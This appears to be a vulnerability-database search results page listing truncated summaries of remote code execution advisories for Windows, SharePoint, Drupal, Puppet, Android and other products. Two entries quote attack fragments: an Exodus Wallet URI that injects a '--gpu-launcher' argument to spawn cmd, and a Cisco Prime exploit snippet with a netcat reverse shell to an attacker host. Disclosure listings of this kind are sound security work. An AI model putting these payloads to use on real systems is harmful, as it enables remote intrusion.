89 matches found
CredSSP Remote Code Execution Vulnerability March 2018 Security Update
The remote Windows host allows fallback to insecure versions of Credential Security Support Provider protocol CredSSP. It is therefore, affected by a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could relay user credentials and use them to execute...
Remote code execution
A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.An attacker who successfully exploited this vulnerability could gain the same user rights as the local user, aka 'LNK Remote Code Execution Vulnerability'...
Microsoft SharePoint Server Remote Code Execution Vulnerability
A remote code execution vulnerability exists in Microsoft SharePoint Server when it fails to properly identify and filter unsafe ASP.Net web controls. An authenticated attacker who successfully exploited the vulnerability could use a specially crafted page to perform actions in the security conte...
KLA11884 Multiple vulnerability in Microsoft Products (ESU)
Multiple vulnerabilities were found in Microsoft Products Extended Support Update. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code. Below is a complete list of vulnerabilities: 1. An elevation of privilege vulnerability in...
CVE-2018-1840
CVE-2018-1840 affects IBM WebSphere Application Server (WAS) 8.5/9.0. The root cause is a privilege-escalation risk when a security domain uses a federated repository other than the global federated repository and the WAS version is migrated to a newer release. Affected products and versions appe...
CVE-2016-4398
HP Network Node Manager i (NNMi) Software versions 10.00, 10.01 (patch1), 10.01 (patch 2), and 10.10 are affected by a remote arbitrary code execution vulnerability due to Java deserialization. The CVE-2016-4398 weakness enables an attacker to potentially run arbitrary code on a vulnerable host v...
CVE-2018-1000525
OpenPSA is affected by a PHP Object Injection vulnerability in form data passed as GET variables, allowing a crafted GET request to serialize a PHP object and potentially disclose information or achieve remote code execution. The issue arises from unsafe deserialization, enabling arbitrary code e...
Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified
Summary There are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.5.1.0 to 1.5.2.5 of IBM Storwize V7000 Unified Vulnerability Details IBM Storwize V7000 Unified is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla...
Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)
Binary data drupalCVE-2018-7600rce.nbin...
CVE-2018-4088
The CVE-2018-4088 entry maps to memory-corruption flaws in WebKit that could allow remote code execution via crafted web content in Apple platforms. Affected products include iOS before 11.2.5, macOS before 10.13.3, Safari before 11.0.3, iCloud/iTunes on Windows, tvOS before 11.2.5, and watchOS b...
MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014
MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014 INTRODUCTION The update that this article describes has been replaced by a newer update on December 9, 2014. We recommend that you install the most current security update for Windows. To install the most...
Exodus Wallet (ElectronJS Framework) Remote Code Execution
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution
Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2780 IOCTL in the webvrpcs process. The issue results...
CVE-2017-0834
A remote code execution vulnerability in the Android media framework libmpeg2. Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63125953...
Unauthenticated Remote Code Execution Vulnerability
Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...
OWASPZAP v2.5.0 - Remote Code Execution Vulnerability
Document Title: =============== OWASPZAP v2.5.0 - Remote Code Execution Vulnerability References: =========== https://www.vulnerability-lab.com/getcontent.php?id=2096 Video: https://www.youtube.com/watch?v=41gr2XhSOw Release Date: ============= 2017-09-18 Vulnerability Laboratory ID VL-ID:...
CVE-2017-12481
CVE-2017-12481 affects Ledger 3.1.1, where the find_option function in option.cc can be triggered by a crafted file to cause a stack-based buffer overflow, leading to a denial of service (and potentially other impact). Public documents in the connected set confirm this CVE alongside related ones ...
BestSafe Browser - Man In The Middle Remote Code Execution
Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution Date: 30/Jun/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com Software Link: See APK archive websites Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As...